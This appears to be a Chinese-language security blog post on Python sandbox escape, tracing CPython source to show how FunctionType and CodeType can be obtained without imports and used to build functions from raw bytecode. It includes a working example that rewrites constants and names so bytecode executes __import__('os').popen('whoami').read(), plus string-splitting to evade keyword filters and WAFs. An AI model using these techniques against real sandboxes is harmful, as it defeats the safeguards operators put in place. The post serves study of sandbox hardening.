本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏。

前言

javascript可以通过Function的构造方法从字符串创建函数。在eval被过滤的情况下可以通过字符串创建函数来绕过:

atob.constructor('console.log(1);')();

最近在学习python沙箱逃逸,学习了python也能像js那样使用构造方法创建函数。本文用于记录一下学到的python中关于__new__有趣的玩法。才疏学浅,如有错误还请师傅们指正。

python object

以下分析中python版本为3.12.6,不同版本略有差异

下载源码:https://github.com/python/cpython/

首先梳理一下python的对象。

python中所有的对象都是由PyObject结构体扩展而来。type感觉类似于java里的Class,负责定义对象的一些基本信息。参考:https://flaggo.github.io/python3-source-code-analysis/objects/object/

type(obj)可以返回对象的typetype中的__new__方法用于创建对象。详细可参考MetaClass:https://liaoxuefeng.com/books/python/oop-adv/meta-class/

__new__最终会调用到PyXXXObject_New api,创建一个对象

PyFunctionObject

PyFunctionObject__new__定义在:cpython/Objects/funcobject.c,有如下注释:

/*[clinic input]
@classmethod
function.__new__ as func_new
    code: object(type="PyCodeObject *", subclass_of="&PyCode_Type")
        a code object
    globals: object(subclass_of="&PyDict_Type")
        the globals dictionary
    name: object = None
        a string that overrides the name from the code object
    argdefs as defaults: object = None
        a tuple that specifies the default argument values
    closure: object = None
        a tuple that supplies the bindings for free variables

Create a function object.
[clinic start generated code]*/

由此可见PyFunctionObject接受PyCodeObject来存放可执行的python代码。

PyFunctionObject对象的__code__属性存储PyCodeObject

static PyGetSetDef func_getsetlist[] = {
    {"__code__", (getter)func_get_code, (setter)func_set_code},
    {"__defaults__", (getter)func_get_defaults,
     (setter)func_set_defaults},
    {"__kwdefaults__", (getter)func_get_kwdefaults,
     (setter)func_set_kwdefaults},
    {"__annotations__", (getter)func_get_annotations,
     (setter)func_set_annotations},
    {"__dict__", PyObject_GenericGetDict, PyObject_GenericSetDict},
    {"__name__", (getter)func_get_name, (setter)func_set_name},
    {"__qualname__", (getter)func_get_qualname, (setter)func_set_qualname},
    {"__type_params__", (getter)func_get_type_params,
     (setter)func_set_type_params},
    {NULL} /* Sentinel */
};

getter方法func_get_code返回一个PyCodeObject

PyCodeObject

不同版本python字节码语法和__new__的参数不同,不要混用,这里就不列出所有版本的写法了。

version >= 3.11

接受参数的文档在cpython/Objects/codeobject.c__new__的注释如下:

/*[clinic input]
@classmethod
code.__new__ as code_new

    argcount: int
    posonlyargcount: int
    kwonlyargcount: int
    nlocals: int
    stacksize: int
    flags: int
    codestring as code: object(subclass_of="&PyBytes_Type")
    constants as consts: object(subclass_of="&PyTuple_Type")
    names: object(subclass_of="&PyTuple_Type")
    varnames: object(subclass_of="&PyTuple_Type")
    filename: unicode
    name: unicode
    qualname: unicode
    firstlineno: int
    linetable: object(subclass_of="&PyBytes_Type")
    exceptiontable: object(subclass_of="&PyBytes_Type")
    freevars: object(subclass_of="&PyTuple_Type", c_default="NULL") = ()
    cellvars: object(subclass_of="&PyTuple_Type", c_default="NULL") = ()
    /

Create a code object.  Not for the faint of heart.
[clinic start generated code]*/

其中python代码用PyBytes_Type类型传递,函数名,变量名等均可控。自由度很高。

version <= 3.9

接受参数的文档在doc中。

PyDoc_STRVAR(code_doc,
"code(argcount, posonlyargcount, kwonlyargcount, nlocals, stacksize,\n\
      flags, codestring, constants, names, varnames, filename, name,\n\
      firstlineno, lnotab[, freevars[, cellvars]])\n\
\n\
Create a code object.  Not for the faint of heart.");

参数类型:

/* Check argument types */
if (argcount < posonlyargcount || posonlyargcount < 0 ||
    kwonlyargcount < 0 || nlocals < 0 ||
    stacksize < 0 || flags < 0 ||
    code == NULL || !PyBytes_Check(code) ||
    consts == NULL || !PyTuple_Check(consts) ||
    names == NULL || !PyTuple_Check(names) ||
    varnames == NULL || !PyTuple_Check(varnames) ||
    freevars == NULL || !PyTuple_Check(freevars) ||
    cellvars == NULL || !PyTuple_Check(cellvars) ||
    name == NULL || !PyUnicode_Check(name) ||
    filename == NULL || !PyUnicode_Check(filename) ||
    lnotab == NULL || !PyBytes_Check(lnotab)) {
    PyErr_BadInternalCall();
    return NULL;
}

值得注意的是 <= 3.9 用到的globals names需要手动传递__globals__ dict,而在>= 3.10中似乎会自动将当前上下文中的内容传递进去。(下文会解释)

构造函数

以下代码中的字节码为python 3.12.6生成的。

debug查看__code__相关属性的值。

def test_func():
    print('1')

1 __code__中的大部分属性都不需要改。

from types import CodeType, FunctionType

argcount = 0
posonlyargcount = 0
kwonlyargcount = 0
nlocals = 0
stacksize = 5
flags = 3
code = b'\x97\x00t\x01\x00\x00\x00\x00\x00\x00\x00\x00d\x01\xab\x01\x00\x00\x00\x00\x00\x00\x01\x00y\x00'
consts = (None, 1)
names = ('print', )
varnames = ()
filename = ''
name = ''
qualname = ''
firstlineno = 1
linetable = b''
exceptiontable = b''

f = FunctionType(CodeType(
    argcount,
    posonlyargcount,
    kwonlyargcount,
    nlocals,
    stacksize,
    flags,
    code,
    consts,
    names,
    varnames,
    filename,
    name,
    qualname,
    firstlineno,
    linetable,
    exceptiontable
), {})

f()
# print(1)

FunctionType构造函数的大括号{}为函数运行时的__globals__ dict,在 >= 3.10版本似乎会自动将当前上下文中的内容传递进去,而在 <= 3.9版本,需要手动传例如 {"print":print}

简化一下:

from types import CodeType, FunctionType

code = b'\x97\x00t\x01\x00\x00\x00\x00\x00\x00\x00\x00d\x01\xab\x01\x00\x00\x00\x00\x00\x00\x01\x00y\x00'
f = FunctionType(CodeType(0, 0, 0, 0, 5, 3, code, (None, 1), ('print', ), (), '', '', '', 1, b'', b''), {})

f()
# print(1)

python字节码用bytes表示,相关变量名等(如print)也用字符串表示,这样就可以很容易通过编码绕过各种检测了,类似于eval的效果。

不使用import获得相关type

CodeTypeFunctionType不属于关键字,也不在__builtins__里。除了通过从types模块import获取,还能通过type()获取,type()__builtins__里的内建方法。

FunctionType可以从任意函数获取:

func_type = type(lambda: None)

CodeType要麻烦些。查找源码中所有引用了PyCodeObject的地方: 2
找到以下可利用的方式:

PyFrameObject.f_code

// cpython/Objects/frameobject.c#L869
static PyGetSetDef frame_getsetlist[] = {
    {"f_back",          (getter)frame_getback, NULL, NULL},
    {"f_locals",        (getter)frame_getlocals, NULL, NULL},
    {"f_lineno",        (getter)frame_getlineno,
                    (setter)frame_setlineno, NULL},
    {"f_trace",         (getter)frame_gettrace, (setter)frame_settrace, NULL},
    {"f_lasti",         (getter)frame_getlasti, NULL, NULL},
    {"f_globals",       (getter)frame_getglobals, NULL, NULL},
    {"f_builtins",      (getter)frame_getbuiltins, NULL, NULL},
    {"f_code",          (getter)frame_getcode, NULL, NULL},
    {"f_trace_opcodes", (getter)frame_gettrace_opcodes, (setter)frame_settrace_opcodes, NULL},
    {0}
};

// cpython/Objects/frameobject.c#L1479
PyCodeObject *
PyFrame_GetCode(PyFrameObject *frame)
{
    assert(frame != NULL);
    assert(!_PyFrame_IsIncomplete(frame->f_frame));
    PyCodeObject *code = frame->f_frame->f_code;
    assert(code != NULL);
    return (PyCodeObject*)Py_NewRef(code);
}

栈帧对象的f_code属性的getter方法可以读取一个PyCodeObject

用法:

def gen():
    yield 0

g = gen()

print(type(g.gi_frame.f_code))
# <class 'code'>

PyFunctionObject.__code__

// cpython/Objects/funcobject.c#L695
static PyGetSetDef func_getsetlist[] = {
    {"__code__", (getter)func_get_code, (setter)func_set_code},
    {"__defaults__", (getter)func_get_defaults,
     (setter)func_set_defaults},
    {"__kwdefaults__", (getter)func_get_kwdefaults,
     (setter)func_set_kwdefaults},
    {"__annotations__", (getter)func_get_annotations,
     (setter)func_set_annotations},
    {"__dict__", PyObject_GenericGetDict, PyObject_GenericSetDict},
    {"__name__", (getter)func_get_name, (setter)func_set_name},
    {"__qualname__", (getter)func_get_qualname, (setter)func_set_qualname},
    {"__type_params__", (getter)func_get_type_params,
     (setter)func_set_type_params},
    {NULL} /* Sentinel */
};

// cpython/Objects/funcobject.c#L462
static PyObject *
func_get_code(PyFunctionObject *op, void *Py_UNUSED(ignored))
{
    if (PySys_Audit("object.__getattr__", "Os", op, "__code__") < 0) {
        return NULL;
    }

    return Py_NewRef(op->func_code);
}

function对象的__code__属性的getter方法return一个PyCodeObject

用法:

def test():
    pass

print(type(test.__code__))
# <class 'code'>

PyGenObject.gi_code

// cpython/Objects/genobject.c#L774
static PyObject *
gen_getcode(PyGenObject *gen, void *Py_UNUSED(ignored))
{
    return _gen_getcode(gen, "gi_code");
}

static PyGetSetDef gen_getsetlist[] = {
    {"__name__", (getter)gen_get_name, (setter)gen_set_name,
     PyDoc_STR("name of the generator")},
    {"__qualname__", (getter)gen_get_qualname, (setter)gen_set_qualname,
     PyDoc_STR("qualified name of the generator")},
    {"gi_yieldfrom", (getter)gen_getyieldfrom, NULL,
     PyDoc_STR("object being iterated by yield from, or None")},
    {"gi_running", (getter)gen_getrunning, NULL, NULL},
    {"gi_frame", (getter)gen_getframe,  NULL, NULL},
    {"gi_suspended", (getter)gen_getsuspended,  NULL, NULL},
    {"gi_code", (getter)gen_getcode,  NULL, NULL},
    {NULL} /* Sentinel */
};

生成器的gi_code属性获取code对象。

def gen():
    yield 1

g = gen()

print(type(g.gi_code))
# <class 'code'>

PyCoroObject.cr_code

// cpython/Objects/genobject.c#L1120
static PyObject *
cr_getcode(PyCoroObject *coro, void *Py_UNUSED(ignored))
{
    return _gen_getcode((PyGenObject *)coro, "cr_code");
}

static PyGetSetDef coro_getsetlist[] = {
    {"__name__", (getter)gen_get_name, (setter)gen_set_name,
     PyDoc_STR("name of the coroutine")},
    {"__qualname__", (getter)gen_get_qualname, (setter)gen_set_qualname,
     PyDoc_STR("qualified name of the coroutine")},
    {"cr_await", (getter)coro_get_cr_await, NULL,
     PyDoc_STR("object being awaited on, or None")},
    {"cr_running", (getter)cr_getrunning, NULL, NULL},
    {"cr_frame", (getter)cr_getframe, NULL, NULL},
    {"cr_code", (getter)cr_getcode, NULL, NULL},
    {"cr_suspended", (getter)cr_getsuspended, NULL, NULL},
    {NULL} /* Sentinel */
};

协程的cr_code属性

async def asy():
    pass

a = asy()

print(type(a.cr_code))
# <class 'code'>

PyAsyncGenObject.ag_code

// cpython/Objects/genobject.c#L1527
static PyObject *
ag_getcode(PyGenObject *gen, void *Py_UNUSED(ignored))
{
    return _gen_getcode(gen, "ag_code");
}

static PyGetSetDef async_gen_getsetlist[] = {
    {"__name__", (getter)gen_get_name, (setter)gen_set_name,
     PyDoc_STR("name of the async generator")},
    {"__qualname__", (getter)gen_get_qualname, (setter)gen_set_qualname,
     PyDoc_STR("qualified name of the async generator")},
    {"ag_await", (getter)coro_get_cr_await, NULL,
     PyDoc_STR("object being awaited on, or None")},
     {"ag_frame",  (getter)ag_getframe, NULL, NULL},
     {"ag_code",  (getter)ag_getcode, NULL, NULL},
     {"ag_suspended",  (getter)ag_getsuspended, NULL, NULL},
    {NULL} /* Sentinel */
};

异步生成器的ag_code属性

async def asy_gen():
    yield 0

ag = asy_gen()

print(type(ag.ag_code))
# <class 'code'>

上面几种方法只是查找了类型为PyCodeObject的属性,如果算上mapping对象的dict以及其他module的话可能还有更多。不过单纯地静态分析代码应该不容易找到别的利用方式了(至少我找不到了),可以试试动调看看,不过这就到了我的知识盲区了。

这几种方法都会用到下划线,感觉容易被ban,不过我没有找到一条不包含下划线的调用链。

关于字节码

前面的代码中出现的字节码中并不存在特定的变量名或关键字,python字节码一般只包含对堆栈的操作,所有的变量、常量都保存在namesconsts中。

以下面的代码为例:

以下字节码由python 3.12.6生成

def test():
    print(1)

bytecode = test.__code__.co_code
print(bytecode)

# b'\x97\x00t\x01\x00\x00\x00\x00\x00\x00\x00\x00d\x01\xab\x01\x00\x00\x00\x00\x00\x00\x01\x00y\x00'

用dis解析字节码如下:

0 RESUME                    0
2 LOAD_GLOBAL               1
12 LOAD_CONST               1
14 CALL                     1
22 POP_TOP
24 RETURN_CONST             0

流程:

  1. LOAD_GLOBAL 1,全局变量表中第一个元素的名字是print,然后根据'print'从函数上下文__globals__中找到<built-in function print>并入栈。(这里就对上了前面说的3.9和3.10的差异了)
  2. LOAD_CONST 1,将常量表中第一个元素入栈(push 1)。
  3. CALL 1,从栈中调用函数并接受一个参数(print(1))

所以说同样的字节码修改变量/常量表就可以影响执行结果:

def test():
    return func1(0).func2(1).func3()

code = test.__code__.co_code

func_type = type(lambda: None)
code_type = type((lambda: None).__code__)

f = func_type(code_type(0, 0, 0, 0, 5, 3, code, (None, 'os', 'whoami'), ('__import__', 'popen', 'read'), (), '', '', '', 1, b'', b''), {})

print(f())

python的动态特性导致在创建函数时并不会严格检查代码内容,test函数调用func1(0).func2(2).func3(),修改consts和names后实际执行的是__import__('os').popen('whoami').read()

效果

以下代码运行在 python 3.12.6

async def test():
    pass

functype = type(test)
codetype = type(test().cr_code)
code = b'\x97\x00t\x01\x00\x00\x00\x00\x00\x00\x00\x00d\x01\xab\x01\x00\x00\x00\x00\x00\x00\x01\x00y\x00'

f = functype(codetype(0, 0, 0, 0, 5, 3, code, (None, 5), ('p''r''i''n''t', ), (), '', '', '', 1, b'', b''), {})

f()
# print(5)

可以用来绕waf之类的。

除此之外,能够直接编写并执行字节码意味着能调用偏底层的api,还可以直接触发内存错误结束进程。 3

不过呢,沙箱环境一般不会给予type()_也很有可能被过滤,audit的code.__new__也可以hook code类型的创建。似乎比较鸡肋的样子😅,但感觉应该还有更多有意思的玩法,奈何代码基本功比较差就到此为止了。

参考

https://flaggo.github.io/python3-source-code-analysis/objects/object/

https://jbnrz.com.cn/index.php/2024/08/15/pyjail/

https://book.hacktricks.xyz/generic-methodologies-and-resources/python/bypass-python-sandboxes#creating-the-code-object

https://liaoxuefeng.com/books/python/oop-adv/meta-class/